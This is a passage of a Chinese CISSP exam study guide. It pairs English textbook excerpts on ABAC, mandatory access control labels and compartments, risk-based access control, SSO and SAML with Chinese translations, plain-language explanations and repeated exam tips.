授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

防火墙:防火墙根据规则控制网络流量进出。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

身份管理题要区分识别、认证、授权、审计。

角色、岗位、职责分离常对应 RBAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
防火墙 防火墙根据规则控制网络流量进出。
身份 身份是主体在系统中的标识。
基于角色的访问控制 RBAC RBAC 按角色分配权限,适合岗位清晰的组织。
基于属性的访问控制 ABAC ABAC 根据用户、资源、环境等属性动态决策。
学习单元 13 / PDF P980

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Many software-defined networking (SDN) applications use ABAC models. Chapter 11, “Secure Network Architecture and Components,” discusses SDN in greater depth. In short, an SDN separates the infrastructure layer (sometimes called the infrastructure plane or data plane) from the control layer (sometimes called the control plane). This separation gives an organization more freedom to purchase hardware from different sources. The ABAC model provides the organization with more flexibility when managing the SDN. As an example, a software-defined wide area network (SD-WAN) solution could implement policies to allow or block traffic.

Administrators create ABAC policies using plain language statements such as “Allow Managers to access the WAN using tablets or smartphones.” This allows users in the Managers role to access the WAN using tablet devices or smartphones. Notice how this improves the rule-based access control model. The rule-based access control applies to all users, but the ABAC can be much more specific. Mobile device management (MDM) systems, discussed in Chapter 9, “Security Vulnerabilities, Threats, and Countermeasures,” can use attributes to identify mobile devices. Chapter 13 gave some attribute examples such as somewhere you are, somewhere you aren't, and context-aware authentication.

Context-aware attributes can include the time of day, the type of device, and much more. An MDM system can use these as authentication attributes. For example, imagine an organization wants to grant users access to the network during work hours and only when using a specific Androidbased phone. The MDM system can verify these attributes and allow the user to log on when the attributes match. Mandatory Access Controls A mandatory access control (MAC) model relies on the use of classification labels, discussed in Chapter 5, “Protecting Security of Assets.” Each classification label represents a security domain, or a realm of security.

A security domain is a collection of subjects and objects that share a common security policy. For example, a security domain could have the label Secret, and the MAC model would protect all objects with the Secret label in the same manner. Subjects are only able to access objects with the Secret label when they have a matching Secret label that indicates they are cleared to access Secret information. Note that users may have more than one label if they are cleared to access multiple levels of information. Additionally, the requirement for subjects to gain the Secret label is the same for all subjects.

中文直译 / 整理

许多软件定义网络(SDN)应用程序使用ABAC模型。 第11章“安全网络架构 与组件”更深入地讨论了SDN。 简而言之,SDN将基础设施层(有时称为基础 设施平面或数据平面)与控制层(有时称为控制平面)分离。 这种分离使组织 在采购硬件时拥有更多自由度。 ABAC模型为组织在管理SDN时提供了更大的 灵活性。 例如,软件定义广域网(SD‑WAN)解决方案可以实施策略以允许或阻止流量。 管理员使用自然语言语句创建ABAC策略,例如“允许管理人员使用平板电脑 或智能手机访问广域网”。 这使得属于“管理人员”角色的用户能够使用平板 设备或智能手机访问广域网。 请注意,这改进了基于规则的访问控制模型。 基 于规则的访问控制适用于所有用户,而ABAC则可以更加具体。 移动设备管理(MDM)系统在第9章“安全漏洞、威胁与应对措施”中进行了 讨论,可以使用属性来识别移动设备。 第13章提供了一些属性示例,例如您所 在的位置、您不在的位置以及上下文感知身份验证。 上下文感知属性可包括一 天中的时间、设备类型等更多内容。 MDM系统可将这些作为身份验证属性使 用。

例如,假设一个组织希望在工作时间内仅允许用户使用特定的Android手 机访问网络。 MDM系统可以验证这些属性,并在属性匹配时允许用户登录。 强制访问控制 一个 强制访问控制(MAC) 模型依赖于分类标签的使用,该标签在 第5章 “保护资产安全”中进行了讨论。 每个分类标签代表一个安全 域,或一个安 全领域。 安全域是一组共享相同安全策略的主体和对象。 例如,一个安全域 可以具有“秘密”标签,MAC 模型将以相同的方式保护所有带有“秘密”标 签的对象。 只有当主体具有匹配的“秘密”标签,表明其有权访问秘密信息 时,才能访问带有“秘密”标签的对象。 请注意,如果用户被授权访问多个 级别的信息,则他们可能拥有多个标签。 此外,主体获得“秘密”标签的要 求对所有主体都相同。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 14 / PDF P981

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Users have labels assigned to them based on their clearance level, which is a form of privilege. Similarly, objects have labels, which indicate their level of classification or sensitivity. For example, the U.S. military uses the labels Top Secret, Secret, Confidential, and Unclassified to classify data. Administrators can grant access to Top Secret data to users with Top Secret clearances. However, administrators cannot grant access to Top Secret data to users with lower-level clearances such as Secret and Confidential. Organizations in the private sector often use labels such as confidential (or proprietary), private, sensitive, and public.

Governments use labels mandated by law, but private sector organizations are free to use whatever labels they choose. The MAC model is often referred to as a lattice-based model. Figure 14.2 shows an example of a lattice-based MAC model. It is reminiscent of a lattice in a garden, such as a rose lattice used to train climbing roses. The horizontal lines labeled Confidential, Private, Sensitive, and Public mark the upper bounds of the classification levels. For example, the area between Public and Sensitive includes objects labeled Sensitive (the upper boundary). Users with the Sensitive label can access Sensitive data.

FIGURE 14.2 A representation of the boundaries provided by lattice-based access controls

中文直译 / 整理

用户的标签根据其权限级别分配,这是一种特权形式。 类似地,对象也具有标 签,用于指示其分类或敏感级别。 例如,美国军方使用“绝密”、“秘密”、 “机密”和“未分类”等标签对数据进行分类。 管理员可以授予具有“绝密” 权限的用户访问“绝密”数据的权限。 然而,管理员不能向具有较低级别权限(如秘密和机密)的用户授予对绝密数据的访问权限。 私营部门的组织通常使用诸如机密(或专有)、私有、敏感和公开等标签。 政 府使用法律规定的标签,而私营部门的组织可以自由选择任何他们希望使用的 标签。 MAC模型通常被称为基于格的模型。 图14.2展示了一个基于格的MAC模型示 例。 它让人联想到花园中的格子,例如用于培育攀援玫瑰的玫瑰格子。 水平线 上标注的“保密”、“私有”、“敏感”和“公开”标识了分类级别的上限。 例如,公开与敏感之间的区域包含标记为“敏感”的对象(上限)。 拥有“敏 感”标签的用户可以访问敏感数据。 图 14.2 基于格的访问控制所提供的边界表示

小白解释

场景先行:你是公司的安全负责人,正在读第 981 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 15 / PDF P982

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

The MAC model also allows labels to identify more defined security domains. Within the Confidential section (between Private and Confidential), there are four separate security domains labeled Lentil, Foil, Crimson, and Matterhorn. These all include Confidential data but are maintained in separate compartments for an added layer of protection. Users with the Confidential label also require the additional label to access data within these compartments. For example, to access Lentil data, users need to have both the Confidential label and the Lentil label. Similarly, the compartments labeled Domino, Primrose, Sleuth, and Potluck include Private data.

Users need the Private label and one of the labels in this compartment to access the data within that compartment. The labels in Figure 14.2 are names of World War II military operations, but an organization can use any names for the labels. The key is that these sections provide an added level of compartmentalization for objects such as data. Notice that Sensitive data (between the Public and Sensitive boundaries) doesn't have any additional labels. Users with the Sensitive label can be granted access to any data with the Sensitive label. Personnel within the organization identify the labels and define their meanings as well as the requirements to obtain the labels.

Administrators then assign the labels to subjects and objects. With the labels in place, the system determines access based on the assigned labels. Using compartmentalization with the MAC model enforces the need to know principle. Users with the Confidential label are not automatically granted access to compartments within the Confidential section. However, if their job requires them to have access to certain data, such as data with the Crimson label, an administrator can assign them the Crimson label to grant them access to this compartment. The MAC model is prohibitive rather than permissive, and it uses an implicit deny philosophy.

If users are not specifically granted access to data, the system denies them access to the associated data. The MAC model is more secure than the DAC model, but it isn't as flexible or scalable. Security classifications indicate a hierarchy of sensitivity. For example, if you consider the military security labels of Top Secret, Secret, Confidential, and Unclassified, the Top Secret label includes the most sensitive data and unclassified is the least sensitive. Because of this hierarchy, someone cleared for Top Secret data is cleared for Secret and less sensitive data. However, classifications don't have to include lower levels. It is possible to use MAC MAC

中文直译 / 整理

模型还允许使用标签来标识更明确的安全域。 在“保密”区域(介于“私 有”和“保密”之间)内,有四个独立的安全域,分别标记为“扁豆”、“箔”、 “深红”和“马特洪峰”。 这些区域都包含保密数据,但为了增加一层保护而 被划分在独立的隔间中。 拥有“保密”标签的用户还需要额外的标签才能访问 这些隔间中的数据。 例如,要访问“扁豆”数据,用户必须同时拥有“保密” 标签和“扁豆”标签。 类似地,标记为 Domino、Primrose、Sleuth 和 Potluck 的 compartment 包含私 有数据。 用户需要具有私有标签以及该 compartment 中的其中一个标签,才能访问 该 compartment 中的数据。 标签 图 14.2 中的名称是第二次世界大战期间军事行动的名称,但组织可以为 标签使用任何名称。 关键是,这些部分为数据等对象提供了额外的隔离层级。 请注意,敏感数据(位于公共和敏感边界之间)没有任何附加标签。 具有敏感 标签的用户可被授予访问任何具有敏感标签的数据的权限。 组织内的人员识别标签并定义其含义以及获取标签所需的要求。 管理员随 后将标签分配给主体和对象。

在标签设置完成后,系统根据分配的标签确 定访问权限。 在 MAC 模型中使用隔离机制强制执行 需要知道原则。 具有机密标签的用户不 会自动获得访问机密部分内 compartment 的权限。 但是,如果其工作需要访 问特定数据(例如具有 Crimson 标签的数据),管理员可以为其分配 Crimson 标签,以授予其访问该 compartment 的权限。 MAC模型是禁止型而非允许型的,它采用隐式拒绝原则。 如果用户未被明确 授予访问数据的权限,系统将拒绝其访问相关数据。 MAC模型比DAC模型更 安全,但灵活性和可扩展性较差。 安全分类表示敏感性的层次结构。 例如,如果您考虑军事安全标签中的绝密、 机密、秘密和非密级,绝密标签包含最敏感的数据,而非密级则最不敏感。 由 于这种层次结构,获得绝密数据权限的人也具备机密及更低敏感级别数据的权 限。 然而,分类不一定包含较低级别。 可以使用MAC

小白解释

场景先行:你是公司的安全负责人,正在读第 982 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

自主访问控制 DAC:DAC 由对象所有者决定谁能访问。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

文件所有者授权、ACL 常见于 DAC。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
自主访问控制 DAC DAC 由对象所有者决定谁能访问。
学习单元 16 / PDF P983

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

labels so that a clearance for a higher-level label does not include clearance for a lower-level label. A key point about the MAC model is that every object and every subject has one or more labels. These labels are predefined, and the system determines access based on assigned labels. Classifications within a MAC model use one of the following three types of environment: Hierarchical Environment A hierarchical environment relates various classification labels in an ordered structure from low security to medium security to high security, such as Confidential, Secret, and Top Secret, respectively. Each level or classification label in the structure is related.

Clearance in one level grants the subject access to objects in that level as well as to all objects in lower levels but prohibits access to all objects in higher levels. For example, someone with a Top Secret clearance can access Top Secret data and Secret data. Compartmentalized Environment In a compartmentalized environment, there is no relationship between one security domain and another. Each domain represents a separate isolated compartment. To gain access to an object, the subject must have specific clearance for the object's security domain.

Hybrid Environment A hybrid environment combines both hierarchical and compartmentalized concepts so that each hierarchical level may contain numerous subdivisions that are isolated from the rest of the security domain. A subject must have the correct clearance and the need to know data within a specific compartment to gain access to the compartmentalized object. A hybrid MAC environment provides granular control over access but becomes increasingly difficult to manage as it grows. Figure 14.2 is an example of a hybrid environment. Risk-Based Access Control Risk-based access control is relatively new, and the implementation can be quite complex.

The model attempts to evaluate risk by considering several different elements, such as:

中文直译 / 整理

标签,使得较高级别标签的权限不包含较低级别标签的权限。 MAC模型的一个关键点是,每个对象和每个主体都具有一个或多个标 签。 这些标签是预先定义的,系统根据分配的标签来确定访问权限。 MAC模型中的分类使用以下三种环境类型之一: 分层环境 分层环境 按照从低安全到中安全再到高安全的有序结构关联各种分 类标签,例如分别为机密、秘密和绝密。 该结构中的每个级别或分类标签都是 相互关联的。 某一等级的许可使主体能够访问该等级的对象以及所有较低等级 的对象,但禁止访问所有较高等级的对象。 例如,拥有绝密许可的人可以访问 绝密数据和秘密数据。 隔离环境 在隔离环境中,一个安全域与另一个安全域之间没有关系。 每个域 代表一个独立的隔离分区。 要访问某个对象,主体必须具有该对象安全域的特 定许可。 混合环境 一个 混合环境 结合了分层和隔离两种概念,使得每个分层级别可能包 含多个与其余安全域隔离的子分区。 主体必须具有正确的许可以及对特定分区中 数据的“需要知道”权限,才能访问隔离对象。 混合MAC环境提供了对访问的 精细控制,但随着规模扩大,管理难度也不断增加。 图14.2 是混合环境的一个 示例。

基于风险的访问控制 基于风险的访问控制是相对较新的,其实现可能相当复杂。 该模型试图通过 考虑多个不同因素来评估风险,例如:

小白解释

场景先行:你是公司的安全负责人,正在读第 983 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

分层:分层把控制按层排列,让攻击者必须连续突破。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

ISO 偏标准和管理体系。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
分层 分层把控制按层排列,让攻击者必须连续突破。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 17 / PDF P984

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

The environment The situation Security policies In this context, a security policy is software code that makes risk-based decisions based on available data. An organization would modify the choices within the software to support their needs. For example, consider an information system containing patient information and used by medical professionals. Doctors, nurses, and others working in the emergency room (ER) of a hospital need access to this data for any patient who shows up in the ER. In this scenario, the environment is the ER, and the situation is a medical emergency. Security policies will likely consider this a low risk and grant full access to patient data to doctors and nurses.

Consider the same database that is used by personnel in the pharmacy department. In this case, the environment is the pharmacy, and the situation is the dispensing of medication. Security policies will likely consider this to be medium or low risk. The risk-based model would grant some access to the patient data to identify any potential adverse drug interactions. However, the model would prevent access to the full medical history of patients. These are simplified examples of an environment. Within cybersecurity, the environment can include items such as the location using the IP address.

Some low-risk IP addresses may be internal IP addresses and Internet-based IP addresses of users who have previously signed in. High-risk IP addresses could be from foreign countries, anonymized IP addresses, users signed in from two or more IPs in different countries, and users signed in from unfamiliar locations. The situation may include what a device is doing. As an example, most Internet of Things (IoT) devices have predictable behavior. If an IoT device suddenly starts flooding a network with malicious traffic, the risk based model could determine the device is now a high risk and block its access to the network.

Two other things can be checked or required before the policy grants access: Multifactor Authentication The system will deny access to users logging on with just one factor of authentication.

中文直译 / 整理

环境 情况 安全策略 在此背景下,安全策略是一种基于可用数据做出风险评估决策的软件代码。 组 织会修改软件中的选项以满足其需求。 例如,考虑一个包含患者信息并由医疗专业人员使用的信息系统。 医院急诊室 (ER)的医生、护士和其他工作人员需要访问任何抵达急诊室的患者的该数据。 在此场景中,环境是急诊室,情况是医疗紧急事件。 安全策略可能会将此视为 低风险,并向医生和护士授予对患者数据的完全访问权限。 考虑同一个被药房人员使用的数据库。 在这种情况下,环境是药房,情况是药 物发放。 安全策略可能会将其视为中等或低风险。 基于风险的模型会授予部分 访问权限以识别潜在的药物不良相互作用,但会阻止访问患者的完整病史。 这些是环境的简化示例。 在网络安全中,环境可能包括使用IP地址的地点等项 目。 一些低风险IP地址可能是内部IP地址,或之前曾登录过的用户的基于互联 网的IP地址。 高风险IP地址可能来自外国、匿名化IP地址、从两个或更多不同 国家的IP地址登录的用户,以及从不熟悉的位置登录的用户。 情况可能包括设备正在执行的操作。 例如,大多数物联网(IoT)设备具有 可预测的行为。

如果某个物联网设备突然开始向网络发送大量恶意流量,基 于风险的模型可能会判定该设备现在属于高风险,并阻止其访问网络。 在策略授予访问权限之前,还可以检查或要求以下两项: 多因素认证 系统将拒绝仅使用单因素认证登录的用户访问。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

认证:认证是验证“你是不是你声称的那个人”。

政策:政策是高层原则,说明必须遵守什么。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

密码、令牌、生物特征、多因素认证都服务认证。

Policy 高层、强制、稳定;Procedure 具体步骤。

IPS 放在线路中,误报可能影响可用性。

知道的、拥有的、固有的、所处位置、行为特征是常见因素。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
认证 认证是验证“你是不是你声称的那个人”。
政策 政策是高层原则,说明必须遵守什么。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
多因素认证 MFA 使用至少两类不同认证因素,提高认证可信度。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 18 / PDF P985

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Compliant Mobile Devices The policy may require that smartphones and tablets meet specific security requirements, such as an up-to-date operating system and device encryption. A risk-based access control model can sometimes use binary rules to control access. For example, either a user logged in using multifactor authentication or they didn't. However, other policies may require the model to implement machine learning capabilities. It would then make predictive conclusions about current activity based on past actions and grant or block access based on these conclusions.

A risk-based access control model that examines mobile devices for compliance may interact with an existing mobile device management (MDM) system. Chapter 9 covers mobile device management in more depth. Implementing Authentication Systems Authentication systems simplify the management of authentication on the Internet and in internal networks. Chapter 13 discusses federated identity management (FIM) and single sign-on (SSO) concepts in more depth, but as a reminder, FIM allows different organizations to use federations for SSO. For example, after an employee logs on to Company A's network, they can then access resources on Company B's network without logging on again.

Implementing SSO on the Internet Beyond federated identity management systems, many sites support SSO to simplify the user experience. They also provide security to users by ensuring their credentials on one site are not shared with other sites. Imagine you want to transfer money from Bank A to Bank B. You could give your Bank A credentials to Bank B and have them transfer the money. Sound scary? You bet. You should never be required to give your credentials to any third party. Solutions such as SAML, OAuth, OpenID, and OIDC help solve this problem. They share authentication, authorization, or profile information about a user, and some solutions share all three.

中文直译 / 整理

合规移动设备 该策略可能要求智能手机和平板电脑满足特定的安全要求,例如保 持最新的操作系统和设备加密。 基于风险的访问控制模型有时会使用二元规则来控制访问。 例如,用户要么使 用多因素身份验证登录,要么没有登录。 然而,其他策略可能要求模型具备机 器学习能力,从而根据以往的行为对当前活动做出预测性判断,并据此授予或 阻止访问。 检查移动设备合规性的基于风险的访问控制模型可能会与现有的 移动设备管理(MDM)系统交互。 第9章更深入地介绍了移动设备管 理。 实现身份验证系统 身份验证系统简化了互联网和内部网络上的身份验证管理。 第13章更深入地讨 论了联合身份管理(FIM)和单点登录(SSO)概念,但作为提醒,FIM 允 许不同组织使用联合体实现 SSO。 例如,员工登录公司 A 的网络后,便可无 需再次登录即可访问公司 B 网络上的资源。 在互联网上实现单点登录 除了联合身份管理系统之外,许多网站还支持单点登录以简化用户体验。 它们 还通过确保用户在某个网站上的凭证不与其他网站共享来为用户提供安全性。 想象一下,你想将资金从银行A转账到银行B。 你可以将银行A的凭据提供给银 行B,让它们完成转账。 听起来很可怕吗?

确实如此。 你绝不应被要求向任何第 三方提供你的凭据。 SAML、OAuth、OpenID 和 OIDC 等解决方案有助于解 决这一问题。 它们共享用户的身份验证、授权或配置信息,有些解决方案甚至 共享全部三项信息。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Policy 高层、强制、稳定;Procedure 具体步骤。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 19 / PDF P986

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

XML Extensible Markup Language (XML) goes beyond describing how to display the data by actually describing the data. XML can include tags to describe data as anything desired. For example, the following tag identifies the data as the results of taking an exam: <ExamResults>Passed</ExamResults>. Databases from multiple vendors can import and export data to and from an XML format, making XML a common language used to exchange information. Many specific schemas exist, and if companies agree on what schema to use, they can easily share information. Many cloud-based providers use XML-based languages to share information for authentication and authorization.

They don't use XML as it is but instead use other languages based on XML. SAML Security Assertion Markup Language (SAML) is an open XML-based standard commonly used to exchange authentication and authorization (AA) information between federated organizations. It provides SSO capabilities for browser access. The Organization for the Advancement of Structured Information Standards (OASIS Open), a nonprofit consortium that encourages open standards development, adopted SAML 2.0 as a standard in 2005 and has maintained it since then. SAML 2.0 is a convergence of SAML 1.1, the Liberty Alliance Identity Federation Framework (ID-FF) 1.2, and Internet2's Shibboleth 1.3.

The SAML 2.0 specification utilizes three entities: the principal (or user), the service provider (SP), and the identity provider (IdP). For example, imagine Sally is accessing her investment account at ucanbeamillionaire.com. The site requires her to log on to access her account, and the site uses SAML 2.0. Principal or User Agent For simplicity, think of Sally as the principal. She's trying to access her investment account at ucanbeamillionaire.com. Service Provider (SP) or Relying Party In this scenario, the ucanbeamillionaire.com site is providing the service and is the service provider.

Identity Provider (IdP) or Asserting Party This is a third party that holds the user authentication and authorization information. XML

中文直译 / 整理

可扩展标记语言(XML)不仅描述了数据的显示方式,还实际描述了数据本身。 XML 可以包含任意自定义的标签来描述数据。 例如,以下标签将数据标识为考 试结果:<ExamResults>Passed</ExamResults>。 来自多个供应商的数据库可以将数据导入和导出为 XML 格式,使 XML 成为 交换信息的通用语言。 存在许多特定的模式,如果公司就使用哪种模式达成一 致,他们就可以轻松地共享信息。 许多基于云的提供商使用基于 XML 的语言 来共享身份验证和授权信息。 它们并不直接使用 XML,而是使用基于 X ML 的其他语言。 SAML 安全断言标记语言(SAML) 是一种开放的基于 XML 的标准,常用于在联合 组织之间交换身份验证和授权(AA)信息。 它为浏览器访问提供了单点登录 (SSO)功能。 促进结构化信息标准组织(OASIS Open)是一个非营利性联盟,致力于推动 开放标准的发展,于2005年采纳 SAML 2.0 作为标准,并自此一直维护。

